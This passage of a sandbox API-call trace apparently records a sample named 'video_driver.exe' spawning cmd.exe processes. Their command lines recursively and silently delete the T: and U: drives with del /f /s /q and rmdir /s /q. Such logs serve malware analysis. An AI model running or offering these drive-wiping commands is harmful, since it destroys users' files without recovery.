(_FileHandle=1) returned 0x7 [0065.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.445] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.445] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.445] GetEnvironmentStringsW () returned 0x4720f8* [0065.445] GetProcessHeap () returned 0x460000 [0065.445] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x472bd0 [0065.445] FreeEnvironmentStringsW (penv=0x4720f8) returned 1 [0065.446] GetProcessHeap () returned 0x460000 [0065.446] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4) returned 0x471898 [0065.446] GetEnvironmentStringsW () returned 0x4720f8* [0065.446] GetProcessHeap () returned 0x460000 [0065.446] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x4736a8 [0065.446] FreeEnvironmentStringsW (penv=0x4720f8) returned 1 [0065.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3eea84 | out: phkResult=0x3eea84*=0x68) returned 0x0 [0065.446] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x0, lpData=0x3eea90*=0x0, lpcbData=0x3eea88*=0x1000) returned 0x2 [0065.446] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x1, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.446] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x0, lpData=0x3eea90*=0x1, lpcbData=0x3eea88*=0x1000) returned 0x2 [0065.446] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x0, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x40, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x40, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x0, lpData=0x3eea90*=0x40, lpcbData=0x3eea88*=0x1000) returned 0x2 [0065.447] RegCloseKey (hKey=0x68) returned 0x0 [0065.447] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3eea84 | out: phkResult=0x3eea84*=0x68) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x0, lpData=0x3eea90*=0x40, lpcbData=0x3eea88*=0x1000) returned 0x2 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x1, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x0, lpData=0x3eea90*=0x1, lpcbData=0x3eea88*=0x1000) returned 0x2 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x0, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x9, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x4, lpData=0x3eea90*=0x9, lpcbData=0x3eea88*=0x4) returned 0x0 [0065.447] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3eea8c, lpData=0x3eea90, lpcbData=0x3eea88*=0x1000 | out: lpType=0x3eea8c*=0x0, lpData=0x3eea90*=0x9, lpcbData=0x3eea88*=0x1000) returned 0x2 [0065.447] RegCloseKey (hKey=0x68) returned 0x0 [0065.448] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6b [0065.448] srand (_Seed=0x5eb34b6b) [0065.448] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q" [0065.448] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q" [0065.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.448] GetProcessHeap () returned 0x460000 [0065.448] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x4720f8 [0065.448] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x472100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.448] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.448] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.448] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.448] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.448] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.448] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.449] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.449] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.449] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.449] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.449] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.449] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.449] GetProcessHeap () returned 0x460000 [0065.449] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472bd0 | out: hHeap=0x460000) returned 1 [0065.449] GetEnvironmentStringsW () returned 0x472310* [0065.449] GetProcessHeap () returned 0x460000 [0065.449] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae2) returned 0x474c70 [0065.449] FreeEnvironmentStringsW (penv=0x472310) returned 1 [0065.449] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.449] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.449] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.449] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.449] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.449] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.449] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.449] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.450] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.450] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.450] GetProcessHeap () returned 0x460000 [0065.450] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x4717c8 [0065.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ef850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ef850, lpFilePart=0x3ef84c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ef84c*="Desktop") returned 0x25 [0065.450] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.450] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ef5cc | out: lpFindFileData=0x3ef5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x475760 [0065.450] FindClose (in: hFindFile=0x475760 | out: hFindFile=0x475760) returned 1 [0065.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ef5cc | out: lpFindFileData=0x3ef5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x475760 [0065.450] FindClose (in: hFindFile=0x475760 | out: hFindFile=0x475760) returned 1 [0065.450] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0065.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ef5cc | out: lpFindFileData=0x3ef5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x475760 [0065.451] FindClose (in: hFindFile=0x475760 | out: hFindFile=0x475760) returned 1 [0065.451] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.451] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0065.451] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0065.451] GetProcessHeap () returned 0x460000 [0065.451] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474c70 | out: hHeap=0x460000) returned 1 [0065.451] GetEnvironmentStringsW () returned 0x474180* [0065.451] GetProcessHeap () returned 0x460000 [0065.451] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x475fa0 [0065.452] FreeEnvironmentStringsW (penv=0x474180) returned 1 [0065.452] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.452] GetProcessHeap () returned 0x460000 [0065.452] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4717c8 | out: hHeap=0x460000) returned 1 [0065.452] GetProcessHeap () returned 0x460000 [0065.452] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400e) returned 0x476ae0 [0065.452] GetProcessHeap () returned 0x460000 [0065.452] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa0) returned 0x472e50 [0065.452] GetProcessHeap () returned 0x460000 [0065.452] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476ae0 | out: hHeap=0x460000) returned 1 [0065.452] GetConsoleOutputCP () returned 0x1b5 [0065.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.453] GetUserDefaultLCID () returned 0x409 [0065.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0065.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ef990, cchData=128 | out: lpLCData="0") returned 2 [0065.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ef990, cchData=128 | out: lpLCData="0") returned 2 [0065.453] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ef990, cchData=128 | out: lpLCData="1") returned 2 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0065.454] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0065.454] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.456] GetProcessHeap () returned 0x460000 [0065.456] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x472ef8 [0065.456] GetConsoleTitleW (in: lpConsoleTitle=0x472ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0065.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.456] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0065.456] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0065.456] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0065.457] GetProcessHeap () returned 0x460000 [0065.457] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x476ae0 [0065.457] GetProcessHeap () returned 0x460000 [0065.457] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4008) returned 0x47aaf8 [0065.457] GetProcessHeap () returned 0x460000 [0065.458] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x4757e0 [0065.458] GetEnvironmentVariableW (in: lpName="p IN (\"T", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="CD") returned 13 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="ERRORLEVEL") returned 11 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="CMDEXTVERSION") returned 13 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="CMDCMDLINE") returned 13 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="DATE") returned 12 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="TIME") returned -4 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="RANDOM") returned -2 [0065.458] _wcsicmp (_String1="p IN (\"T", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.458] GetProcessHeap () returned 0x460000 [0065.458] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4757e0 | out: hHeap=0x460000) returned 1 [0065.458] GetProcessHeap () returned 0x460000 [0065.458] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47aaf8 | out: hHeap=0x460000) returned 1 [0065.458] GetProcessHeap () returned 0x460000 [0065.458] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4008) returned 0x47aaf8 [0065.458] GetProcessHeap () returned 0x460000 [0065.458] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47aaf8 | out: hHeap=0x460000) returned 1 [0065.458] GetProcessHeap () returned 0x460000 [0065.458] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476ae0 | out: hHeap=0x460000) returned 1 [0065.459] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.459] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.459] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.459] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.459] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.459] GetProcessHeap () returned 0x460000 [0065.459] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473110 [0065.459] GetProcessHeap () returned 0x460000 [0065.459] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe) returned 0x46ffc0 [0065.459] GetProcessHeap () returned 0x460000 [0065.459] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x4757e0 [0065.460] GetProcessHeap () returned 0x460000 [0065.460] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4757e0, Size=0x16) returned 0x471800 [0065.460] GetProcessHeap () returned 0x460000 [0065.460] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x471800) returned 0x16 [0065.460] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0065.461] GetProcessHeap () returned 0x460000 [0065.461] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473170 [0065.461] GetProcessHeap () returned 0x460000 [0065.461] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x14) returned 0x4731d0 [0065.461] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.461] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.461] GetProcessHeap () returned 0x460000 [0065.461] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x4731f0 [0065.461] GetProcessHeap () returned 0x460000 [0065.461] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1c) returned 0x4757e0 [0065.461] GetProcessHeap () returned 0x460000 [0065.461] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4757e0, Size=0x14) returned 0x473210 [0065.461] GetProcessHeap () returned 0x460000 [0065.461] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x473210) returned 0x14 [0065.462] _wcsicmp (_String1="del", _String2=")") returned 59 [0065.462] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0065.462] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0065.462] _wcsicmp (_String1="IF", _String2="del") returned 5 [0065.462] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0065.462] _wcsicmp (_String1="REM", _String2="del") returned 14 [0065.462] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0065.462] GetProcessHeap () returned 0x460000 [0065.462] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473230 [0065.462] GetProcessHeap () returned 0x460000 [0065.462] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x10) returned 0x46ffd8 [0065.462] GetProcessHeap () returned 0x460000 [0065.462] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x28) returned 0x473290 [0065.463] GetProcessHeap () returned 0x460000 [0065.463] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x4732c0 [0065.464] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0065.464] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0065.464] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0065.464] GetProcessHeap () returned 0x460000 [0065.464] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473320 [0065.464] GetProcessHeap () returned 0x460000 [0065.464] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x44) returned 0x473380 [0065.464] GetProcessHeap () returned 0x460000 [0065.465] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x14) returned 0x4733d0 [0065.465] GetProcessHeap () returned 0x460000 [0065.465] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4733d0, Size=0x12) returned 0x4733d0 [0065.465] GetProcessHeap () returned 0x460000 [0065.465] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4733d0) returned 0x12 [0065.465] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0065.465] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0065.465] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0065.465] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0065.465] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0065.465] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0065.466] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0065.466] GetProcessHeap () returned 0x460000 [0065.466] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x4733f0 [0065.466] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0065.467] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0065.467] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0065.467] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0065.467] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0065.467] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0065.468] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0065.468] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0065.468] GetProcessHeap () returned 0x460000 [0065.468] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473410 [0065.468] GetProcessHeap () returned 0x460000 [0065.468] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x14) returned 0x473470 [0065.468] GetProcessHeap () returned 0x460000 [0065.468] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x4757e0 [0065.469] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.471] GetFullPathNameW (in: lpFileName="T:", nBufferLength=0x208, lpBuffer=0x3ef680, lpFilePart=0x3ef42c | out: lpBuffer="T:\\", lpFilePart=0x3ef42c*=0x0) returned 0x3 [0065.471] wcsncmp (_String1="T:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -8 [0065.475] GetFileAttributesW (lpFileName="T:\\" (normalized: "t:")) returned 0xffffffff [0065.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.476] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.476] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.476] SetConsoleInputExeNameW () returned 0x1 [0065.476] GetConsoleOutputCP () returned 0x1b5 [0065.476] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.476] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.477] exit (_Code=0) Process: id = "41" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4302c000" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 69 os_tid = 0xacc [0065.697] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fd1c | out: lpSystemTimeAsFileTime=0x24fd1c*(dwLowDateTime=0x4f95f60, dwHighDateTime=0x1d62400)) [0065.697] GetCurrentProcessId () returned 0xb28 [0065.697] GetCurrentThreadId () returned 0xacc [0065.697] GetTickCount () returned 0x1147dc8 [0065.697] QueryPerformanceCounter (in: lpPerformanceCount=0x24fd14 | out: lpPerformanceCount=0x24fd14*=18583048481) returned 1 [0065.698] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0065.698] __set_app_type (_Type=0x1) [0065.698] __p__fmode () returned 0x770331f4 [0065.699] __p__commode () returned 0x770331fc [0065.699] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0065.699] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0065.699] GetCurrentThreadId () returned 0xacc [0065.699] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, 